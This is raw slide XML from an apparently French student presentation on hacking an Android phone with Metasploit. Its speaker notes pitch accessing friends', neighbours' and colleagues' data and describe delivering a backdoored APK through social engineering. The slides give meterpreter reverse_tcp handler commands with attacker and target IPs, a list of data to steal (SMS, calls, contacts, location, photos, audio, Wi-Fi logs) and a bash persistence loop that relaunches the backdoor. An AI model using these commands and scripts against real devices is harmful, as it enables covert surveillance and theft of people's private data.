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17"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="262" r:id="rId2"/>
    <p:sldId id="263" r:id="rId3"/>
    <p:sldId id="264" r:id="rId4"/>
    <p:sldId id="265" r:id="rId5"/>
    <p:sldId id="269" r:id="rId6"/>
    <p:sldId id="266" r:id="rId7"/>
    <p:sldId id="267" r:id="rId8"/>
    <p:sldId id="270" r:id="rId9"/>
    <p:sldId id="271" r:id="rId10"/>
    <p:sldId id="272" r:id="rId11"/>
    <p:sldId id="273" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="274" r:id="rId14"/>
    <p:sldId id="26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9689" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="59" d="100"/>
          <a:sy n="59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036BD-8786-4F46-B69B-C0FA20D4820D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2F1F07E-43CB-4FCF-BFE0-FB1F1018A463}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" err="1"/>
            <a:t>Metasploit</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E39E45B-804E-4873-BDD9-6A7AA361F036}" type="parTrans" cxnId="{08A38C39-50A3-47ED-B95F-FE4DD29F61BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A3EC981-1823-4DE0-BF8B-296CD004104C}" type="sibTrans" cxnId="{08A38C39-50A3-47ED-B95F-FE4DD29F61BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F85502E3-2900-420B-83EB-C322CCDDDAC0}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" err="1"/>
            <a:t>Backdoor</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{412D258F-B5D6-4BEF-9C7C-9F5B37AD3C29}" type="parTrans" cxnId="{BB573635-27E7-4081-B9E3-AC4838CC7D9D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15FFF90C-7AF9-4950-97B6-53F916BF1E02}" type="sibTrans" cxnId="{BB573635-27E7-4081-B9E3-AC4838CC7D9D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1DC6868-4D40-450A-9B68-76DE2B2D0B75}" type="pres">
      <dgm:prSet presAssocID="{0E3036BD-8786-4F46-B69B-C0FA20D4820D}" presName="compositeShape" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="2"/>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4B119DBA-5F4A-400E-B90F-ECEBC78C7465}" type="pres">
      <dgm:prSet presAssocID="{0E3036BD-8786-4F46-B69B-C0FA20D4820D}" presName="ribbon" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17D9FB8D-2804-4B43-8645-C93DEC890A02}" type="pres">
      <dgm:prSet presAssocID="{0E3036BD-8786-4F46-B69B-C0FA20D4820D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1A416A8C-C689-4E1A-A88D-A810E7897150}" type="pres">
      <dgm:prSet presAssocID="{0E3036BD-8786-4F46-B69B-C0FA20D4820D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573635-27E7-4081-B9E3-AC4838CC7D9D}" srcId="{0E3036BD-8786-4F46-B69B-C0FA20D4820D}" destId="{F85502E3-2900-420B-83EB-C322CCDDDAC0}" srcOrd="1" destOrd="0" parTransId="{412D258F-B5D6-4BEF-9C7C-9F5B37AD3C29}" sibTransId="{15FFF90C-7AF9-4950-97B6-53F916BF1E02}"/>
    <dgm:cxn modelId="{7AD82926-16D6-43AC-8661-888960268F9C}" type="presOf" srcId="{F85502E3-2900-420B-83EB-C322CCDDDAC0}" destId="{1A416A8C-C689-4E1A-A88D-A810E7897150}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow6"/>
    <dgm:cxn modelId="{14C062B8-C883-4213-9763-9843D56603D8}" type="presOf" srcId="{0E3036BD-8786-4F46-B69B-C0FA20D4820D}" destId="{A1DC6868-4D40-450A-9B68-76DE2B2D0B75}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow6"/>
    <dgm:cxn modelId="{347A802F-0DCC-4408-B3ED-2EDB3D14A426}" type="presOf" srcId="{F2F1F07E-43CB-4FCF-BFE0-FB1F1018A463}" destId="{17D9FB8D-2804-4B43-8645-C93DEC890A02}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow6"/>
    <dgm:cxn modelId="{08A38C39-50A3-47ED-B95F-FE4DD29F61BE}" srcId="{0E3036BD-8786-4F46-B69B-C0FA20D4820D}" destId="{F2F1F07E-43CB-4FCF-BFE0-FB1F1018A463}" srcOrd="0" destOrd="0" parTransId="{9E39E45B-804E-4873-BDD9-6A7AA361F036}" sibTransId="{5A3EC981-1823-4DE0-BF8B-296CD004104C}"/>
    <dgm:cxn modelId="{90E4C9CC-FA3C-4EF9-9DCB-BBAF328DCFC0}" type="presParOf" srcId="{A1DC6868-4D40-450A-9B68-76DE2B2D0B75}" destId="{4B119DBA-5F4A-400E-B90F-ECEBC78C7465}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow6"/>
    <dgm:cxn modelId="{AEDDC429-9431-4F82-BE26-2DD351CEC51D}" type="presParOf" srcId="{A1DC6868-4D40-450A-9B68-76DE2B2D0B75}" destId="{17D9FB8D-2804-4B43-8645-C93DEC890A02}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow6"/>
    <dgm:cxn modelId="{3D61F1D8-F9F5-4488-8510-D6F6CAF25F19}" type="presParOf" srcId="{A1DC6868-4D40-450A-9B68-76DE2B2D0B75}" destId="{1A416A8C-C689-4E1A-A88D-A810E789715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19DBA-5F4A-400E-B90F-ECEBC78C7465}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="766310"/>
          <a:ext cx="2836718" cy="1134687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FB8D-2804-4B43-8645-C93DEC890A02}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="340406" y="964881"/>
          <a:ext cx="936116" cy="55599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Metasploit</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="340406" y="964881"/>
        <a:ext cx="936116" cy="555996"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1A416A8C-C689-4E1A-A88D-A810E7897150}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1418359" y="1146431"/>
          <a:ext cx="1106320" cy="55599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Backdoor</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1418359" y="1146431"/>
        <a:ext cx="1106320" cy="555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A451-6F8D-4B1B-8489-7CB6605F39B9}" type="datetimeFigureOut">
              <a:rPr lang="en-US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D41C6-211D-4912-AD25-75075069F9C6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Bonjour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>tous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>  ! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0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avez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>tous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>copain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>copine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>voisin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>collègue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> qui on un telephone et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0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avez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>toujours</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>rêver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>d’accèder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>leurs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>données</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Au jour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>d’aujourd’hui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>l’Homme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>moderne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>passe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moyenne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> 3h sur son telephone . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Ont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>utilisent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>mmultiples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> applications, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>sms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>appel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>donc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>va</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0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montrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> comment exploiter un telephone Android avec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Metasploit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 des phrases ne lit pas le slide !!!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On va vous détaillez le dérouler de la présentation !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Android : De manière courte nous vous détaillerons le fonctionnement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> d’Android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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" baseline="0" dirty="0"/>
              <a:t> est un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" baseline="0" dirty="0" err="1"/>
              <a:t>framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" baseline="0" dirty="0"/>
              <a:t> open source totalement gratuit qui permet de tester et d’exploiter des failles de sécurité sur différent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" baseline="0" dirty="0" err="1"/>
              <a:t>device</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" baseline="0" dirty="0"/>
              <a:t> type PC, téléphone, tablette et des failles réseaux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>. Il a été </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>developper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ruby</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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Backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : outil de pirate créant une faille de sécurité en maintenant ouvert un port de communication.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3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qu’il faut retenir c’est que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> le système d’exploitation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Android utilise le noyaux de Linux, il est ouvert et open source.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On peut donc dire qu’Android est une version supplémentaire de Linux, un peu comme Ubuntu, Debian etc…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Attention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t>, il n’est pas un système Linux dans le sens strict du terme.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> faire un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>resumé</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> nous génère un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> que l’utilisateur téléchargera au moyen du Social </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>Ingenering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t>. Une fois l’application installer nous avons l’accès au téléphone.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41C6-211D-4912-AD25-75075069F9C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asploitw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0"/>
            <a:ext cx="12212638" cy="6861658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="android_logo_wallpaper_black_android_logo_black__rcn_internet_broadcast___high_defenition_wallpap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840000">
            <a:off x="10520789" y="5771672"/>
            <a:ext cx="2743200" cy="1688123"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="android_logo_wallpaper_black_android_logo_black__rcn_internet_broadcast___high_defenition_wallpap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0">
            <a:off x="-1302766" y="1112704"/>
            <a:ext cx="2743200" cy="1688123"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="android_logo_wallpaper_black_android_logo_black__rcn_internet_broadcast___high_defenition_wallpap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220969" y="-717481"/>
            <a:ext cx="2743200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Payload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exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>) &gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>android</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1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600" dirty="0"/>
              <a:t>Ici, on charge le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> ». Ce bout de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> sera exécuté sur la machine cible une fois la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>vulnérabilité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> exploitée. Une connexion de type TCP inversée sera alors initialisée et vous permettra d’ouvrir une session distante (même à travers un firewall).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953000" y="-982920"/>
            <a:ext cx="2809009" cy="21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de connexion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exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>) &gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> 10.100.254.240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exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>) &gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>rhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> 10.100.254.151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exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>) &gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> 4444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exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>) &gt; exploit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18" y="5118822"/>
            <a:ext cx="4305300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Récupération des sms passés / reçus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Récupération des appels passés / reçus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Récupération de la liste des contacts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Récupération de la position géographique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Prises de photos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Prises de vidéos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Enregistrements vocaux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Téléchargement d’un fichier du portable sur le PC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Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> d’un fichier du PC au portable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Récupération des logs Wi-Fi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8621">
            <a:off x="9285841" y="-885641"/>
            <a:ext cx="2638797" cy="19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Relance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>backdoor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dirty="0"/>
              <a:t>Script Shell pour relancer le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>backdoor</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>	#!/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>bash</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>true</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>	do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>am</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> --user 0 -a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>android.intent.action.MAIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> -n 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>com.metasploit.stage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>MainActivity</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> 20</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>done</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et exécution du script sur le smartphone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr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upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>  /root/anything.sh /</a:t>
            </a:r>
            <a:r>
